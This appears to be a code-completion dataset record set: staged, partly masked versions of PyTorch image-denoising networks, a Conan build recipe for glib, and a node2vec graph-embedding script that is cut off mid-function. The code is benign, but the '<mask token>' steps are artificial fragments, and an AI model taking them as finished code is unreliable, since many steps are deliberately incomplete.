F.max_unpool2d(F.relu(self.bn[i](self.conv[i + 1]((h +\n h_buff[-j]) / np.sqrt(2)))), idx_buff[-j], kernel_size=(2, \n 2), output_size=shape_buff[-j])\n y = self.conv[D + 1](h) + x\n return y\n\n\nclass DUDnCNN(NNRegressor):\n\n def __init__(self, D, C=64):\n super(DUDnCNN, self).__init__()\n self.D = D\n k = [0]\n k.extend([i for i in range(D // 2)])\n k.extend([k[-1] for _ in range(D // 2, D + 1)])\n l = [(0) for _ in range(D // 2 + 1)]\n l.extend([i for i in range(D + 1 - (D // 2 + 1))])\n l.append(l[-1])\n holes = [(2 ** (kl[0] - kl[1]) - 1) for kl in zip(k, l)]\n dilations = [(i + 1) for i in holes]\n self.conv = nn.ModuleList()\n self.conv.append(nn.Conv2d(3, C, 3, padding=dilations[0], dilation=\n dilations[0]))\n self.conv.extend([nn.Conv2d(C, C, 3, padding=dilations[i + 1],\n dilation=dilations[i + 1]) for i in range(D)])\n self.conv.append(nn.Conv2d(C, 3, 3, padding=dilations[-1], dilation\n =dilations[-1]))\n for i in range(len(self.conv[:-1])):\n nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity=\n 'relu')\n self.bn = nn.ModuleList()\n self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)])\n for i in range(D):\n nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))\n\n def forward(self, x):\n D = self.D\n h = F.relu(self.conv[0](x))\n h_buff = []\n for i in range(D // 2 - 1):\n torch.backends.cudnn.benchmark = True\n h = self.conv[i + 1](h)\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n h_buff.append(h)\n for i in range(D // 2 - 1, D // 2 + 1):\n torch.backends.cudnn.benchmark = True\n h = self.conv[i + 1](h)\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n for i in range(D // 2 + 1, D):\n j = i - (D // 2 + 1) + 1\n torch.backends.cudnn.benchmark = True\n h = self.conv[i + 1]((h + h_buff[-j]) / np.sqrt(2))\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n y = self.conv[D + 1](h) + x\n return y\n", "step-3": "<mask token>\n\n\nclass DnCNN(NNRegressor):\n <mask token>\n\n def forward(self, x):\n D = self.D\n h = F.relu(self.conv[0](x))\n for i in range(D):\n h = F.relu(self.bn[i](self.conv[i + 1](h)))\n y = self.conv[D + 1](h) + x\n return y\n\n\nclass UDnCNN(NNRegressor):\n\n def __init__(self, D, C=64):\n super(UDnCNN, self).__init__()\n self.D = D\n self.conv = nn.ModuleList()\n self.conv.append(nn.Conv2d(3, C, 3, padding=1))\n self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)])\n self.conv.append(nn.Conv2d(C, 3, 3, padding=1))\n for i in range(len(self.conv[:-1])):\n nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity=\n 'relu')\n self.bn = nn.ModuleList()\n self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)])\n for i in range(D):\n nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))\n\n def forward(self, x):\n D = self.D\n h = F.relu(self.conv[0](x))\n h_buff = []\n idx_buff = []\n shape_buff = []\n for i in range(D // 2 - 1):\n shape_buff.append(h.shape)\n h, idx = F.max_pool2d(F.relu(self.bn[i](self.conv[i + 1](h))),\n kernel_size=(2, 2), return_indices=True)\n h_buff.append(h)\n idx_buff.append(idx)\n for i in range(D // 2 - 1, D // 2 + 1):\n h = F.relu(self.bn[i](self.conv[i + 1](h)))\n for i in range(D // 2 + 1, D):\n j = i - (D // 2 + 1) + 1\n h = F.max_unpool2d(F.relu(self.bn[i](self.conv[i + 1]((h +\n h_buff[-j]) / np.sqrt(2)))), idx_buff[-j], kernel_size=(2, \n 2), output_size=shape_buff[-j])\n y = self.conv[D + 1](h) + x\n return y\n\n\nclass DUDnCNN(NNRegressor):\n\n def __init__(self, D, C=64):\n super(DUDnCNN, self).__init__()\n self.D = D\n k = [0]\n k.extend([i for i in range(D // 2)])\n k.extend([k[-1] for _ in range(D // 2, D + 1)])\n l = [(0) for _ in range(D // 2 + 1)]\n l.extend([i for i in range(D + 1 - (D // 2 + 1))])\n l.append(l[-1])\n holes = [(2 ** (kl[0] - kl[1]) - 1) for kl in zip(k, l)]\n dilations = [(i + 1) for i in holes]\n self.conv = nn.ModuleList()\n self.conv.append(nn.Conv2d(3, C, 3, padding=dilations[0], dilation=\n dilations[0]))\n self.conv.extend([nn.Conv2d(C, C, 3, padding=dilations[i + 1],\n dilation=dilations[i + 1]) for i in range(D)])\n self.conv.append(nn.Conv2d(C, 3, 3, padding=dilations[-1], dilation\n =dilations[-1]))\n for i in range(len(self.conv[:-1])):\n nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity=\n 'relu')\n self.bn = nn.ModuleList()\n self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)])\n for i in range(D):\n nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))\n\n def forward(self, x):\n D = self.D\n h = F.relu(self.conv[0](x))\n h_buff = []\n for i in range(D // 2 - 1):\n torch.backends.cudnn.benchmark = True\n h = self.conv[i + 1](h)\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n h_buff.append(h)\n for i in range(D // 2 - 1, D // 2 + 1):\n torch.backends.cudnn.benchmark = True\n h = self.conv[i + 1](h)\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n for i in range(D // 2 + 1, D):\n j = i - (D // 2 + 1) + 1\n torch.backends.cudnn.benchmark = True\n h = self.conv[i + 1]((h + h_buff[-j]) / np.sqrt(2))\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n y = self.conv[D + 1](h) + x\n return y\n", "step-4": "import os\nimport numpy as np\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\nimport torch.utils.data as td\nimport torchvision as tv\nimport pandas as pd\nfrom PIL import Image\nfrom matplotlib import pyplot as plt\nfrom utils import imshow, NNRegressor\n\n\nclass DnCNN(NNRegressor):\n\n def __init__(self, D, C=64):\n super(DnCNN, self).__init__()\n self.D = D\n self.conv = nn.ModuleList()\n self.conv.append(nn.Conv2d(3, C, 3, padding=1))\n self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)])\n self.conv.append(nn.Conv2d(C, 3, 3, padding=1))\n for i in range(len(self.conv[:-1])):\n nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity=\n 'relu')\n self.bn = nn.ModuleList()\n self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)])\n for i in range(D):\n nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))\n\n def forward(self, x):\n D = self.D\n h = F.relu(self.conv[0](x))\n for i in range(D):\n h = F.relu(self.bn[i](self.conv[i + 1](h)))\n y = self.conv[D + 1](h) + x\n return y\n\n\nclass UDnCNN(NNRegressor):\n\n def __init__(self, D, C=64):\n super(UDnCNN, self).__init__()\n self.D = D\n self.conv = nn.ModuleList()\n self.conv.append(nn.Conv2d(3, C, 3, padding=1))\n self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)])\n self.conv.append(nn.Conv2d(C, 3, 3, padding=1))\n for i in range(len(self.conv[:-1])):\n nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity=\n 'relu')\n self.bn = nn.ModuleList()\n self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)])\n for i in range(D):\n nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))\n\n def forward(self, x):\n D = self.D\n h = F.relu(self.conv[0](x))\n h_buff = []\n idx_buff = []\n shape_buff = []\n for i in range(D // 2 - 1):\n shape_buff.append(h.shape)\n h, idx = F.max_pool2d(F.relu(self.bn[i](self.conv[i + 1](h))),\n kernel_size=(2, 2), return_indices=True)\n h_buff.append(h)\n idx_buff.append(idx)\n for i in range(D // 2 - 1, D // 2 + 1):\n h = F.relu(self.bn[i](self.conv[i + 1](h)))\n for i in range(D // 2 + 1, D):\n j = i - (D // 2 + 1) + 1\n h = F.max_unpool2d(F.relu(self.bn[i](self.conv[i + 1]((h +\n h_buff[-j]) / np.sqrt(2)))), idx_buff[-j], kernel_size=(2, \n 2), output_size=shape_buff[-j])\n y = self.conv[D + 1](h) + x\n return y\n\n\nclass DUDnCNN(NNRegressor):\n\n def __init__(self, D, C=64):\n super(DUDnCNN, self).__init__()\n self.D = D\n k = [0]\n k.extend([i for i in range(D // 2)])\n k.extend([k[-1] for _ in range(D // 2, D + 1)])\n l = [(0) for _ in range(D // 2 + 1)]\n l.extend([i for i in range(D + 1 - (D // 2 + 1))])\n l.append(l[-1])\n holes = [(2 ** (kl[0] - kl[1]) - 1) for kl in zip(k, l)]\n dilations = [(i + 1) for i in holes]\n self.conv = nn.ModuleList()\n self.conv.append(nn.Conv2d(3, C, 3, padding=dilations[0], dilation=\n dilations[0]))\n self.conv.extend([nn.Conv2d(C, C, 3, padding=dilations[i + 1],\n dilation=dilations[i + 1]) for i in range(D)])\n self.conv.append(nn.Conv2d(C, 3, 3, padding=dilations[-1], dilation\n =dilations[-1]))\n for i in range(len(self.conv[:-1])):\n nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity=\n 'relu')\n self.bn = nn.ModuleList()\n self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)])\n for i in range(D):\n nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))\n\n def forward(self, x):\n D = self.D\n h = F.relu(self.conv[0](x))\n h_buff = []\n for i in range(D // 2 - 1):\n torch.backends.cudnn.benchmark = True\n h = self.conv[i + 1](h)\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n h_buff.append(h)\n for i in range(D // 2 - 1, D // 2 + 1):\n torch.backends.cudnn.benchmark = True\n h = self.conv[i + 1](h)\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n for i in range(D // 2 + 1, D):\n j = i - (D // 2 + 1) + 1\n torch.backends.cudnn.benchmark = True\n h = self.conv[i + 1]((h + h_buff[-j]) / np.sqrt(2))\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n y = self.conv[D + 1](h) + x\n return y\n", "step-5": "import os\nimport numpy as np\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\nimport torch.utils.data as td\nimport torchvision as tv\nimport pandas as pd\nfrom PIL import Image\nfrom matplotlib import pyplot as plt\nfrom utils import imshow, NNRegressor\n\n\nclass DnCNN(NNRegressor):\n\n def __init__(self, D, C=64):\n super(DnCNN, self).__init__()\n self.D = D\n\n # convolution layers\n self.conv = nn.ModuleList()\n self.conv.append(nn.Conv2d(3, C, 3, padding=1))\n self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)])\n self.conv.append(nn.Conv2d(C, 3, 3, padding=1))\n # apply He's initialization\n for i in range(len(self.conv[:-1])):\n nn.init.kaiming_normal_(\n self.conv[i].weight.data, nonlinearity='relu')\n\n # batch normalization\n self.bn = nn.ModuleList()\n self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)])\n # initialize the weights of the Batch normalization layers\n for i in range(D):\n nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))\n\n def forward(self, x):\n D = self.D\n h = F.relu(self.conv[0](x))\n for i in range(D):\n h = F.relu(self.bn[i](self.conv[i+1](h)))\n y = self.conv[D+1](h) + x\n return y\n\n\nclass UDnCNN(NNRegressor):\n\n def __init__(self, D, C=64):\n super(UDnCNN, self).__init__()\n self.D = D\n\n # convolution layers\n self.conv = nn.ModuleList()\n self.conv.append(nn.Conv2d(3, C, 3, padding=1))\n self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)])\n self.conv.append(nn.Conv2d(C, 3, 3, padding=1))\n # apply He's initialization\n for i in range(len(self.conv[:-1])):\n nn.init.kaiming_normal_(\n self.conv[i].weight.data, nonlinearity='relu')\n\n # batch normalization\n self.bn = nn.ModuleList()\n self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)])\n # initialize the weights of the Batch normalization layers\n for i in range(D):\n nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))\n\n def forward(self, x):\n D = self.D\n h = F.relu(self.conv[0](x))\n h_buff = []\n idx_buff = []\n shape_buff = []\n for i in range(D//2-1):\n shape_buff.append(h.shape)\n h, idx = F.max_pool2d(F.relu(self.bn[i](self.conv[i+1](h))),\n kernel_size=(2, 2), return_indices=True)\n h_buff.append(h)\n idx_buff.append(idx)\n for i in range(D//2-1, D//2+1):\n h = F.relu(self.bn[i](self.conv[i+1](h)))\n for i in range(D//2+1, D):\n j = i - (D // 2 + 1) + 1\n h = F.max_unpool2d(F.relu(self.bn[i](self.conv[i+1]((h+h_buff[-j])/np.sqrt(2)))),\n idx_buff[-j], kernel_size=(2, 2), output_size=shape_buff[-j])\n y = self.conv[D+1](h) + x\n return y\n\n\nclass DUDnCNN(NNRegressor):\n\n def __init__(self, D, C=64):\n super(DUDnCNN, self).__init__()\n self.D = D\n\n # compute k(max_pool) and l(max_unpool)\n k = [0]\n k.extend([i for i in range(D//2)])\n k.extend([k[-1] for _ in range(D//2, D+1)])\n l = [0 for _ in range(D//2+1)]\n l.extend([i for i in range(D+1-(D//2+1))])\n l.append(l[-1])\n\n # holes and dilations for convolution layers\n holes = [2**(kl[0]-kl[1])-1 for kl in zip(k, l)]\n dilations = [i+1 for i in holes]\n\n # convolution layers\n self.conv = nn.ModuleList()\n self.conv.append(\n nn.Conv2d(3, C, 3, padding=dilations[0], dilation=dilations[0]))\n self.conv.extend([nn.Conv2d(C, C, 3, padding=dilations[i+1],\n dilation=dilations[i+1]) for i in range(D)])\n self.conv.append(\n nn.Conv2d(C, 3, 3, padding=dilations[-1], dilation=dilations[-1]))\n # apply He's initialization\n for i in range(len(self.conv[:-1])):\n nn.init.kaiming_normal_(\n self.conv[i].weight.data, nonlinearity='relu')\n\n # batch normalization\n self.bn = nn.ModuleList()\n self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)])\n # initialize the weights of the Batch normalization layers\n for i in range(D):\n nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))\n\n def forward(self, x):\n D = self.D\n h = F.relu(self.conv[0](x))\n h_buff = []\n\n for i in range(D//2 - 1):\n torch.backends.cudnn.benchmark = True\n h = self.conv[i+1](h)\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n h_buff.append(h)\n\n for i in range(D//2 - 1, D//2 + 1):\n torch.backends.cudnn.benchmark = True\n h = self.conv[i+1](h)\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n\n for i in range(D//2 + 1, D):\n j = i - (D//2 + 1) + 1\n torch.backends.cudnn.benchmark = True\n h = self.conv[i+1]((h + h_buff[-j]) / np.sqrt(2))\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n\n y = self.conv[D+1](h) + x\n return y\n", "step-ids": [ 4, 7, 8, 10, 11 ] }
[ 4, 7, 8, 10, 11 ]
from conans import * class GlibConan(ConanFile): name = "glib" description = "Common C routines used by Gtk+ and other libs" license = "LGPL" settings = {"os": ["Linux"], "arch": ["x86_64", "armv8"]} build_requires = ( "generators/1.0.0", "autotools/1.0.0", ) requires = ( "glibc/[>=2.31]", "sh/[>=]", ) def source(self): tools.get(f"ftp://ftp.gnome.org/pub/gnome/sources/glib/1.2/glib-{self.version}.tar.gz") def build(self): args = [ "--disable-static", ] autotools = AutoToolsBuildEnvironment(self) autotools.configure(args=args, configure_dir=f"{self.name}-{self.version}") autotools.make() autotools.install()
normal
{ "blob_id": "e49c5c6475a1210a9657d7bbd0490c8d20863718", "index": 2285, "step-1": "<mask token>\n\n\nclass GlibConan(ConanFile):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def build(self):\n args = ['--disable-static']\n autotools = AutoToolsBuildEnvironment(self)\n autotools.configure(args=args, configure_dir=\n f'{self.name}-{self.version}')\n autotools.make()\n autotools.install()\n", "step-2": "<mask token>\n\n\nclass GlibConan(ConanFile):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def source(self):\n tools.get(\n f'ftp://ftp.gnome.org/pub/gnome/sources/glib/1.2/glib-{self.version}.tar.gz'\n )\n\n def build(self):\n args = ['--disable-static']\n autotools = AutoToolsBuildEnvironment(self)\n autotools.configure(args=args, configure_dir=\n f'{self.name}-{self.version}')\n autotools.make()\n autotools.install()\n", "step-3": "<mask token>\n\n\nclass GlibConan(ConanFile):\n name = 'glib'\n description = 'Common C routines used by Gtk+ and other libs'\n license = 'LGPL'\n settings = {'os': ['Linux'], 'arch': ['x86_64', 'armv8']}\n build_requires = 'generators/1.0.0', 'autotools/1.0.0'\n requires = 'glibc/[>=2.31]', 'sh/[>=]'\n\n def source(self):\n tools.get(\n f'ftp://ftp.gnome.org/pub/gnome/sources/glib/1.2/glib-{self.version}.tar.gz'\n )\n\n def build(self):\n args = ['--disable-static']\n autotools = AutoToolsBuildEnvironment(self)\n autotools.configure(args=args, configure_dir=\n f'{self.name}-{self.version}')\n autotools.make()\n autotools.install()\n", "step-4": "from conans import *\n\n\nclass GlibConan(ConanFile):\n name = 'glib'\n description = 'Common C routines used by Gtk+ and other libs'\n license = 'LGPL'\n settings = {'os': ['Linux'], 'arch': ['x86_64', 'armv8']}\n build_requires = 'generators/1.0.0', 'autotools/1.0.0'\n requires = 'glibc/[>=2.31]', 'sh/[>=]'\n\n def source(self):\n tools.get(\n f'ftp://ftp.gnome.org/pub/gnome/sources/glib/1.2/glib-{self.version}.tar.gz'\n )\n\n def build(self):\n args = ['--disable-static']\n autotools = AutoToolsBuildEnvironment(self)\n autotools.configure(args=args, configure_dir=\n f'{self.name}-{self.version}')\n autotools.make()\n autotools.install()\n", "step-5": "from conans import *\n\nclass GlibConan(ConanFile):\n name = \"glib\"\n description = \"Common C routines used by Gtk+ and other libs\"\n license = \"LGPL\"\n settings = {\"os\": [\"Linux\"], \"arch\": [\"x86_64\", \"armv8\"]}\n build_requires = (\n \"generators/1.0.0\",\n \"autotools/1.0.0\",\n )\n requires = (\n \"glibc/[>=2.31]\",\n \"sh/[>=]\",\n )\n\n def source(self):\n tools.get(f\"ftp://ftp.gnome.org/pub/gnome/sources/glib/1.2/glib-{self.version}.tar.gz\")\n\n def build(self):\n args = [\n \"--disable-static\",\n ]\n autotools = AutoToolsBuildEnvironment(self)\n autotools.configure(args=args, configure_dir=f\"{self.name}-{self.version}\")\n autotools.make()\n autotools.install()\n", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
<|reserved_special_token_0|> class node2vec_walk: def __init__(self, nx_G, is_directed, p, q): self.G = nx_G self.is_directed = is_directed self.p = p self.q = q def node2vec_walk(self, walk_length, start_node): G = self.G alias_nodes = self.alias_nodes alias_edges = self.alias_edges walk = [start_node] while len(walk) < walk_length: curr = walk[-1] cur_nbrs = sorted(G.neighbors(curr)) if len(cur_nbrs) > 0: if len(walk) == 1: walk.append(cur_nbrs[alias_draw(alias_nodes[curr][0], alias_nodes[curr][1])]) else: prev = walk[-2] next = cur_nbrs[alias_draw(alias_edges[prev, curr][0], alias_edges[prev, curr][1])] walk.append(next) else: break return walk def simulate_walks(self, num_walks, walk_length): G = self.G walks = [] nodes = list(G.nodes()) print('Walk iteration...') for walk_iter in range(num_walks): print(f'{walk_iter + 1}/{num_walks}') random.shuffle(nodes) for node in nodes: walks.append(self.node2vec_walk(walk_length, node)) return walks def get_alias_edge(self, src, dst): G = self.G p = self.p q = self.q unnormalized_probs = [] for dst_nbr in sorted(G.neighbors(dst)): if dst_nbr == src: unnormalized_probs.append(G[dst][dst_nbr]['weight'] / p) elif G.has_edge(dst_nbr, src): unnormalized_probs.append(G[dst][dst_nbr]['weight']) else: unnormalized_probs.append(G[dst][dst_nbr]['weight'] / q) norm_cost = sum(unnormalized_probs) normalized_probs = [(float(v) / norm_cost) for v in unnormalized_probs] return alias_setup(normalized_probs) def preprocess_transition_probs(self): G = self.G is_directed = self.is_directed alias_nodes = {} for node in G.nodes(): unnormalized_probs = [G[node][nbr]['weight'] for nbr in sorted( G.neighbors(node))] norm_const = sum(unnormalized_probs) normalized_probs = [(float(v) / norm_const) for v in unnormalized_probs] alias_nodes[node] = alias_setup(normalized_probs) alias_edges = {} if is_directed: for edge in G.edges(): alias_edges[edge] = self.get_alias_edge(edge[0], edge[1]) else: for edge in G.edges(): alias_edges[edge] = self.get_alias_edge(edge[0], edge[1]) alias_edges[edge[1], edge[0]] = self.get_alias_edge(edge[1], edge[0]) self.alias_nodes = alias_nodes self.alias_edges = alias_edges <|reserved_special_token_0|> def read_graph(): if args.weighted: G = nx.read_edgelist(args.input, nodetype=int, data=(('weight', float),), create_using=nx.DiGraph) else: G = nx.read_edgelist(args.input, nodetype=int, create_using=nx. DiGraph()) for edge in G.edges(): G[edge[0]][edge[1]]['weight'] = 1 if not args.directed: G = G.to_undirected() return G <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class node2vec_walk: def __init__(self, nx_G, is_directed, p, q): self.G = nx_G self.is_directed = is_directed self.p = p self.q = q def node2vec_walk(self, walk_length, start_node): G = self.G alias_nodes = self.alias_nodes alias_edges = self.alias_edges walk = [start_node] while len(walk) < walk_length: curr = walk[-1] cur_nbrs = sorted(G.neighbors(curr)) if len(cur_nbrs) > 0: if len(walk) == 1: walk.append(cur_nbrs[alias_draw(alias_nodes[curr][0], alias_nodes[curr][1])]) else: prev = walk[-2] next = cur_nbrs[alias_draw(alias_edges[prev, curr][0], alias_edges[prev, curr][1])] walk.append(next) else: break return walk def simulate_walks(self, num_walks, walk_length): G = self.G walks = [] nodes = list(G.nodes()) print('Walk iteration...') for walk_iter in range(num_walks): print(f'{walk_iter + 1}/{num_walks}') random.shuffle(nodes) for node in nodes: walks.append(self.node2vec_walk(walk_length, node)) return walks def get_alias_edge(self, src, dst): G = self.G p = self.p q = self.q unnormalized_probs = [] for dst_nbr in sorted(G.neighbors(dst)): if dst_nbr == src: unnormalized_probs.append(G[dst][dst_nbr]['weight'] / p) elif G.has_edge(dst_nbr, src): unnormalized_probs.append(G[dst][dst_nbr]['weight']) else: unnormalized_probs.append(G[dst][dst_nbr]['weight'] / q) norm_cost = sum(unnormalized_probs) normalized_probs = [(float(v) / norm_cost) for v in unnormalized_probs] return alias_setup(normalized_probs) def preprocess_transition_probs(self): G = self.G is_directed = self.is_directed alias_nodes = {} for node in G.nodes(): unnormalized_probs = [G[node][nbr]['weight'] for nbr in sorted( G.neighbors(node))] norm_const = sum(unnormalized_probs) normalized_probs = [(float(v) / norm_const) for v in unnormalized_probs] alias_nodes[node] = alias_setup(normalized_probs) alias_edges = {} if is_directed: for edge in G.edges(): alias_edges[edge] = self.get_alias_edge(edge[0], edge[1]) else: for edge in G.edges(): alias_edges[edge] = self.get_alias_edge(edge[0], edge[1]) alias_edges[edge[1], edge[0]] = self.get_alias_edge(edge[1], edge[0]) self.alias_nodes = alias_nodes self.alias_edges = alias_edges <|reserved_special_token_0|> def read_graph(): if args.weighted: G = nx.read_edgelist(args.input, nodetype=int, data=(('weight', float),), create_using=nx.DiGraph) else: G = nx.read_edgelist(args.input, nodetype=int, create_using=nx. DiGraph()) for edge in G.edges(): G[edge[0]][edge[1]]['weight'] = 1 if not args.directed: G = G.to_undirected() return G <|reserved_special_token_0|> def main(args): nx_G = read_graph() G = node2vec_walk(nx_G, args.directed, args.p, args.q) G.preprocess_transition_probs() walks = G.simulate_walks(args.num_walks, args.walk_length) model = learning_walks(walks) _embeddings = {} for v in nx_G.nodes(): _embeddings[str(v)] = model.wv[str(v)] plot_embeddings(_embeddings, args.label_file) <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class node2vec_walk: def __init__(self, nx_G, is_directed, p, q): self.G = nx_G self.is_directed = is_directed self.p = p self.q = q def node2vec_walk(self, walk_length, start_node): G = self.G alias_nodes = self.alias_nodes alias_edges = self.alias_edges walk = [start_node] while len(walk) < walk_length: curr = walk[-1] cur_nbrs = sorted(G.neighbors(curr)) if len(cur_nbrs) > 0: if len(walk) == 1: walk.append(cur_nbrs[alias_draw(alias_nodes[curr][0], alias_nodes[curr][1])]) else: prev = walk[-2] next = cur_nbrs[alias_draw(alias_edges[prev, curr][0], alias_edges[prev, curr][1])] walk.append(next) else: break return walk def simulate_walks(self, num_walks, walk_length): G = self.G walks = [] nodes = list(G.nodes()) print('Walk iteration...') for walk_iter in range(num_walks): print(f'{walk_iter + 1}/{num_walks}') random.shuffle(nodes) for node in nodes: walks.append(self.node2vec_walk(walk_length, node)) return walks def get_alias_edge(self, src, dst): G = self.G p = self.p q = self.q unnormalized_probs = [] for dst_nbr in sorted(G.neighbors(dst)): if dst_nbr == src: unnormalized_probs.append(G[dst][dst_nbr]['weight'] / p) elif G.has_edge(dst_nbr, src): unnormalized_probs.append(G[dst][dst_nbr]['weight']) else: unnormalized_probs.append(G[dst][dst_nbr]['weight'] / q) norm_cost = sum(unnormalized_probs) normalized_probs = [(float(v) / norm_cost) for v in unnormalized_probs] return alias_setup(normalized_probs) def preprocess_transition_probs(self): G = self.G is_directed = self.is_directed alias_nodes = {} for node in G.nodes(): unnormalized_probs = [G[node][nbr]['weight'] for nbr in sorted( G.neighbors(node))] norm_const = sum(unnormalized_probs) normalized_probs = [(float(v) / norm_const) for v in unnormalized_probs] alias_nodes[node] = alias_setup(normalized_probs) alias_edges = {} if is_directed: for edge in G.edges(): alias_edges[edge] = self.get_alias_edge(edge[0], edge[1]) else: for edge in G.edges(): alias_edges[edge] = self.get_alias_edge(edge[0], edge[1]) alias_edges[edge[1], edge[0]] = self.get_alias_edge(edge[1], edge[0]) self.alias_nodes = alias_nodes self.alias_edges = alias_edges def alias_setup(probs): K = len(probs) q = np.zeros(K) J = np.zeros(K, dtype=np.int) smaller = [] larger = [] for kk, prob in enumerate(probs): q[kk] = K * prob if q[kk] > 1.0: larger.append(kk) else: smaller.append(kk) while len(smaller) > 0 and len(larger) > 0: small = smaller.pop() large = larger.pop() J[small] = large q[large] = q[small] + q[large] - 1 if q[large] < 1.0: smaller.append(large) else: larger.append(large) return J, q def alias_draw(J, q): K = len(J) kk = int(np.floor(np.random.rand() * K)) if np.random.rand() < q[kk]: return kk else: return J[kk] def parse_args(): parser = argparse.ArgumentParser(description='Run node2vec.') parser.add_argument('--input', nargs='?', default= './data/Wiki_edgelist.txt', help='Input graph path') parser.add_argument('--output', nargs='?', default= 'emb/node2vec_wiki.emb', help='Embeddings path') parser.add_argument('--label_file', nargs='?', default= 'data/wiki_labels.txt', help='Labels path') parser.add_argument('--dimensions', type=int, default=128, help= 'Number of dimensions. Default is 128.') parser.add_argument('--walk-length', type=int, default=80, help= 'Length of walk per source. Default is 80.') parser.add_argument('--num-walks', type=int, default=20, help= 'Number of walks per source. Default is 10.') parser.add_argument('--window-size', type=int, default=10, help= 'Context size for optimization. Default is 10.') parser.add_argument('--iter', default=2, type=int, help= 'Number of epochs in SGD') parser.add_argument('--workers', type=int, default=8, help= 'Number of parallel workers. Default is 8.') parser.add_argument('--p', type=float, default=1, help= 'Return hyperparameter. Default is 1.') parser.add_argument('--q', type=float, default=1, help= 'Inout hyperparameter. Default is 1.') parser.add_argument('--weighted', dest='weighted', action='store_true', help='Boolean specifying (un)weighted. Default is unweighted.') parser.add_argument('--unweighted', dest='unweighted', action='store_false' ) parser.set_defaults(weighted=False) parser.add_argument('--directed', dest='directed', action='store_true', help='Graph is (un)directed. Default is undirected.') parser.add_argument('--undirected', dest='undirected', action='store_false' ) parser.set_defaults(directed=False) return parser.parse_args() def read_graph(): if args.weighted: G = nx.read_edgelist(args.input, nodetype=int, data=(('weight', float),), create_using=nx.DiGraph) else: G = nx.read_edgelist(args.input, nodetype=int, create_using=nx. DiGraph()) for edge in G.edges(): G[edge[0]][edge[1]]['weight'] = 1 if not args.directed: G = G.to_undirected() return G def learning_walks(walks): walks = [list(map(str, walk)) for walk in walks] model = Word2Vec(walks, size=args.dimensions, window=args.window_size, min_count=0, sg=1, workers=args.workers, iter=args.iter) model.wv.save_word2vec_format(args.output) return model def main(args): nx_G = read_graph() G = node2vec_walk(nx_G, args.directed, args.p, args.q) G.preprocess_transition_probs() walks = G.simulate_walks(args.num_walks, args.walk_length) model = learning_walks(walks) _embeddings = {} for v in nx_G.nodes(): _embeddings[str(v)] = model.wv[str(v)] plot_embeddings(_embeddings, args.label_file) <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class node2vec_walk: def __init__(self, nx_G, is_directed, p, q): self.G = nx_G self.is_directed = is_directed self.p = p self.q = q def node2vec_walk(self, walk_length, start_node): G = self.G alias_nodes = self.alias_nodes alias_edges = self.alias_edges walk = [start_node] while len(walk) < walk_length: curr = walk[-1] cur_nbrs = sorted(G.neighbors(curr)) if len(cur_nbrs) > 0: if len(walk) == 1: walk.append(cur_nbrs[alias_draw(alias_nodes[curr][0], alias_nodes[curr][1])]) else: prev = walk[-2] next = cur_nbrs[alias_draw(alias_edges[prev, curr][0], alias_edges[prev, curr][1])] walk.append(next) else: break return walk def simulate_walks(self, num_walks, walk_length): G = self.G walks = [] nodes = list(G.nodes()) print('Walk iteration...') for walk_iter in range(num_walks): print(f'{walk_iter + 1}/{num_walks}') random.shuffle(nodes) for node in nodes: walks.append(self.node2vec_walk(walk_length, node)) return walks def get_alias_edge(self, src, dst): G = self.G p = self.p q = self.q unnormalized_probs = [] for dst_nbr in 